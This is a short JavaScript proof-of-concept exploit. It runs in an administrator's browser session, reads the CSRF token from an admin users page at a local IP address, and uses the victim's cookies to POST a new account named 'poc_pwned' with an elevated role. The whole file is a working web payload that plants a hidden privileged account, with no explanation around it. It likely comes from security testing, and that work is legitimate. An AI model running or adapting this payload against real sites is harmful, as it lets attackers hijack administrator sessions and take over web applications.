const targeturl = "http://192.168.0.24/admin/users"

async function make_user(endpoint, token) {
    const body = new URLSearchParams({
        _token: token,
        name: 'poc_pwned',
        email: 'poc_pwned@localhost.com',
        password: 'poc_pwned',
        role: '2'
    });
  
    try {
        const res = await fetch(endpoint, {
            method: 'POST',
            headers: {
                'Content-Type': 'application/x-www-form-urlencoded'
            },
            body: body.toString(),
            credentials: 'include'
        });
  
        if (!res.ok) {
            const text = await res.text();
        }
  
        const contentType = res.headers.get('content-type') || '';
        if (contentType.includes('application/json')) {
            return await res.json();
        } else {
            return await res.text();
        }
    } catch (err) {
        throw err;
    }
  }

async function perform_magic() {
    const response = await fetch(targeturl);
    const html = await response.text();
  
    const parser = new DOMParser();
    const doc = parser.parseFromString(html, 'text/html');
    const meta = doc.querySelector('meta[name="csrf-token"]');
  
    if (!meta) {
      console.log("lol wtf");
      return;
    }
  
    make_user(targeturl, meta.content)
}

perform_magic()